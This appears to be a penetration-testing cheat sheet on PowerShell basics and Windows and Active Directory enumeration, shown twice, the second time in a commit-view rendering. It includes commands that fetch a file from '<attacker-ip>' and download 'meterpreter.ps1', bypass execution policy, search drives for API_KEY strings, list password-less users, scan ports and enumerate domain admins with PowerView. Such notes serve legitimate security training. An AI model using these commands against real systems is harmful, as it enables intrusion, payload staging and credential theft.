killchain-compendium/enumeration/windows/powershell.md

# Powershell Usage

## Get-Help
```
Get-Help Command-Name 
```
* Show examples
```
Get-Help Command-Name -Examples
```

* Get-Command gets all the cmdlets installed on the current Computer. 
```
Get-Command
```
```
Get-Command Verb-*
Get-Command Invoke-*
Get-Command Get-*
```

## Passing Output via Pipe
* A pipe passes object including methods and attributes.

```
Verb-Noun | Get-Member
```
```
Get-Command | Get-Member -MemberType Method
```

## Creating Objects from Previous Cmdlets
```
Get-ChildItem | Select-Object -Property Mode, Name
```
* first - gets the first x object
* last - gets the last x object
* unique - shows the unique objects
* skip - skips x objects

## Filtering Objects
```
Verb-Noun | Where-Object -Property PropertyName -operator Value
Verb-Noun | Where-Object {$_.PropertyName -operator Value}
```
The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.
* Where -operator is a list of the following operators:

* -Contains: if any item in the property value is an exact match for the specified value
* -EQ: if the property value is the same as the specified value
* -GT: if the property value is greater than the specified value

## Sort Object
```
Verb-Noun | Sort-Object
```
```
Get-ChildItem | Sort-Object
```

## Finding a File
```
Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue | Where-Object {$_.Name -match 'interesting-file'}
``` 
```sh
Get-HotFix | Format-list | findstr <searchstring>
```

## Showing File Content
```
Get-Content 'C:\Program Files\interesting-file.txt'
```

## Copy File Content
```sh
Copy-Item <sourcefile> <destfile>
```

## Count Lines of Output
As an example, count all cmdlets on the system
```
Get-Command | Where-Object CommandType -eq CmdLet | Measure-Object
```

## Checksum of File
```
Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'
```

## Current Working Directory
```
Get-Location
```

## File Metadata 
```sh
ls | Format-List *
```

## Web Request
```sh
Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>
```
```sh
(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')
```

## Base64 Decode File
```
[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))
```

## **Circumvent Execution-Policy**
```sh
powershell -ExecutionPolicy Bypass -File .\<file>
```
```sh
Set-ExecutionPolicy Bypass -Scope Process
```

## Enumeration

### Users
```
Get-LocalUser
```

* Password not required users
```
Get-LocalUser | Where-Object -Property PasswordRequired -Match false
```

* SID of users
```
Get-WmiObject win32_useraccount | Select name, sid
```

### Network intel
* IP Address
```
Get-NetIpAddress
```

* Listening TCP Ports
```
Get-NetTCPConnection | Where-Object -Property State -Match Listen | measure
```

* TCP Port by number
```
Get-NetTCPConnection | Where-Object -Property LocalPort -Match 443
```

### Patch level and updates
```
Get-Hotfix
```
* Find patch by HotFixID
```
Get-Hotfix | Where-Object -Property HotFixID -Match KB124284
```

### Find files and Content
* Find backup files
```
Get-ChildItem -Path C:\ -Recurse -Include *.bak* -ErroAction SilentlyContinue
```

* Find file contents
```
Get-ChildItem -Path C:\* -Recurse | Select-String -pattern API_KEY
```

### Processes
* Start processes
```sh 
Start-Process <process>
```

* Running processes
```sh
Get-Process <process>
```
* Scheduled Tasks, by TaskName
```
Get-ScheduledTask | Where-Object -Property TaskName -Match taskname
```
or
```
Get-ScheduledTask -TaskName taskname
```

### Export Output
* Export as CSV
```sh
Get-Process <process> | Export-Csv <output.csv>
```

### ACL
* Owner of files
```
Get-ACL C:\
```

### Port Scanner
```
for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}
``` 

### Ping Hosts
```sh
1..15 | %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ | Select-String ttl}
```

### Using Powerview
```sh
Import-Module .\powerview.ps1
Get-NetDomainController
(Get-NetUser).name
Get-NetUser -properties description
Get-NetUser | select -ExpandProperty lastlogon
Get-NetComputer -ping
Get-NetGroupMember "Domain Admins"
Find-DomainShare -CheckShareAccess
```
* Enumerate Group Policy
```sh
Get-NetGPO
```
* Trust relationship to other domains
```sh
Get-NetDomainTrust
```
* User enumeration
```sh
Find-LocalAdminAccess
```
second commit 2021-08-23 01:13:54 +02:00			`# Powershell Usage`

			`## Get-Help`
			```
			`Get-Help Command-Name`
			```
			`* Show examples`
			```
			`Get-Help Command-Name -Examples`
			```

			`* Get-Command gets all the cmdlets installed on the current Computer.`
			```
			`Get-Command`
			```
			```
			`Get-Command Verb-*`
			`Get-Command Invoke-*`
			`Get-Command Get-*`
			```

			`## Passing Output via Pipe`
			`* A pipe passes object including methods and attributes.`

			```
			`Verb-Noun \| Get-Member`
			```
			```
			`Get-Command \| Get-Member -MemberType Method`
			```

			`## Creating Objects from Previous Cmdlets`
			```
			`Get-ChildItem \| Select-Object -Property Mode, Name`
			```
			`* first - gets the first x object`
			`* last - gets the last x object`
			`* unique - shows the unique objects`
			`* skip - skips x objects`

			`## Filtering Objects`
			```
			`Verb-Noun \| Where-Object -Property PropertyName -operator Value`
			`Verb-Noun \| Where-Object {$_.PropertyName -operator Value}`
			```
			`The second version uses the $_ operator to iterate through every object passed to the Where-Object cmdlet.`
			`* Where -operator is a list of the following operators:`

			`* -Contains: if any item in the property value is an exact match for the specified value`
			`* -EQ: if the property value is the same as the specified value`
			`* -GT: if the property value is greater than the specified value`

			`## Sort Object`
			```
			`Verb-Noun \| Sort-Object`
			```
			```
			`Get-ChildItem \| Sort-Object`
			```

			`## Finding a File`
			```
			`Get-ChildItem -Path C:\ -Recurse -Include *.txt -ErrorAction SilentlyContinue \| Where-Object {$_.Name -match 'interesting-file'}`
			```
			```sh
			`Get-HotFix \| Format-list \| findstr <searchstring>`
			```

			`## Showing File Content`
			```
			`Get-Content 'C:\Program Files\interesting-file.txt'`
			```

			`## Copy File Content`
			```sh
			`Copy-Item <sourcefile> <destfile>`
			```

			`## Count Lines of Output`
			`As an example, count all cmdlets on the system`
			```
			`Get-Command \| Where-Object CommandType -eq CmdLet \| Measure-Object`
			```

			`## Checksum of File`
			```
			`Get-FileHash -Algorithm MD5 'C:\Program Files\interesting-file.txt'`
			```

			`## Current Working Directory`
			```
			`Get-Location`
			```

			`## File Metadata`
			```sh
			`ls \| Format-List *`
			```

			`## Web Request`
			```sh
			`Invoke-Webrequest -Uri 'http://<attacker-ip> -OutFile <filename>`
			```
			```sh
			`(New-Object System.Net.WebClient).DownloadFile("http://example.com/meterpreter.ps1", 'meterpreter.ps1')`
			```

			`## Base64 Decode File`
			```
			`[System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String((Get-Content .\Desktop\b64.txt)))`
			```

			`## Circumvent Execution-Policy`
			```sh
			`powershell -ExecutionPolicy Bypass -File .\<file>`
			```
			```sh
			`Set-ExecutionPolicy Bypass -Scope Process`
			```

			`## Enumeration`

			`### Users`
			```
			`Get-LocalUser`
			```

			`* Password not required users`
			```
			`Get-LocalUser \| Where-Object -Property PasswordRequired -Match false`
			```

			`* SID of users`
			```
			`Get-WmiObject win32_useraccount \| Select name, sid`
			```

			`### Network intel`
			`* IP Address`
			```
			`Get-NetIpAddress`
			```

			`* Listening TCP Ports`
			```
			`Get-NetTCPConnection \| Where-Object -Property State -Match Listen \| measure`
			```

			`* TCP Port by number`
			```
			`Get-NetTCPConnection \| Where-Object -Property LocalPort -Match 443`
			```

			`### Patch level and updates`
			```
			`Get-Hotfix`
			```
			`* Find patch by HotFixID`
			```
			`Get-Hotfix \| Where-Object -Property HotFixID -Match KB124284`
			```

			`### Find files and Content`
			`* Find backup files`
			```
			`Get-ChildItem -Path C:\ -Recurse -Include .bak -ErroAction SilentlyContinue`
			```

			`* Find file contents`
			```
			`Get-ChildItem -Path C:\* -Recurse \| Select-String -pattern API_KEY`
			```

			`### Processes`
			`* Start processes`
			```sh
			`Start-Process <process>`
			```

			`* Running processes`
			```sh
			`Get-Process <process>`
			```
			`* Scheduled Tasks, by TaskName`
			```
			`Get-ScheduledTask \| Where-Object -Property TaskName -Match taskname`
			```
			`or`
			```
			`Get-ScheduledTask -TaskName taskname`
			```

			`### Export Output`
			`* Export as CSV`
			```sh
			`Get-Process <process> \| Export-Csv <output.csv>`
			```

			`### ACL`
			`* Owner of files`
			```
			`Get-ACL C:\`
			```

			`### Port Scanner`
			```
			`for($i=1; $i -le 65536; $i++) { Test-NetConnection localhost -Port $i}`
			```

			`### Ping Hosts`
			```sh
			`1..15 \| %{echo "10.0.2.$_"; ping -n 1 10.0.2$_ \| Select-String ttl}`
			```

			`### Using Powerview`
			```sh
			`Import-Module .\powerview.ps1`
			`Get-NetDomainController`
			`(Get-NetUser).name`
			`Get-NetUser -properties description`
			`Get-NetUser \| select -ExpandProperty lastlogon`
			`Get-NetComputer -ping`
			`Get-NetGroupMember "Domain Admins"`
			`Find-DomainShare -CheckShareAccess`
			```
			`* Enumerate Group Policy`
			```sh
			`Get-NetGPO`
			```
			`* Trust relationship to other domains`
			```sh
			`Get-NetDomainTrust`
			```
			`* User enumeration`
			```sh
			`Find-LocalAdminAccess`
			```